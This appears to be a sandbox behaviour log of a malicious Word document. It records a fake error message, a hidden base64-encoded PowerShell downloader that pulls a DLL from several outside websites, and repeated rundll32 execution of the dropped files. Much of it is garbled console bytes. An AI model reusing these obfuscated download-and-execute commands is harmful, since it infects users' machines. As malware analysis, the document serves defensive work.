Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....O................/.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O................/.j......................u.............}..v....(.......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....@.......0................E].....(.......T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[................/.j......................u.............}..v....x.......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v............0................E].....$.......T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g................/.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....s................/.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s................/.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....%......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@&................u.............}..v.....&......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....-......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....5......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@6................u.............}..v.....6......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....=......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@>................u.............}..v.....>......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....E......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@F................u.............}..v.....F......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....'................/.j....@I]...............u.............}..v.....M......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'................/.j....@N................u.............}..v.....N......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....3................/.j....@I]...............u.............}..v.....U......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3................/.j....@V................u.............}..v.....V......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....?................/.j....@I]...............u.............}..v.....]......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?................/.j....@^................u.............}..v.....^......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....K................/.j....@I]...............u.............}..v.....e......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K................/.j....@f................u.............}..v.....f......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....W................/.j....@I]...............u.............}..v.....m......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W................/.j....@n................u.............}..v.....n......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....c................/.j....@I]...............u.............}..v.....u......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c................/.j....@v................u.............}..v.....v......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....o................/.j....@I]...............u.............}..v.....}......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o................/.j....@~................u.............}..v.....~......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....{................/.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{................/.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0................E].....<.......T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j......................u.............}..v....8.......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j......................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v...................../.j....@I]...............u.............}..v....h.......0.................%.....r.......T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j.... .................u.............}..v............0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ......../.j....@I]...............u.............}..v....0.......0................E].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...................../.j......................u.............}..v....h.......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E.................u.............}..v............0...............X.].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E.................u.............}..v....x4......0...............X.].............T............... Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: ARCH_25_012021.doc Virustotal: Detection: 57%
Source: ARCH_25_012021.doc ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAP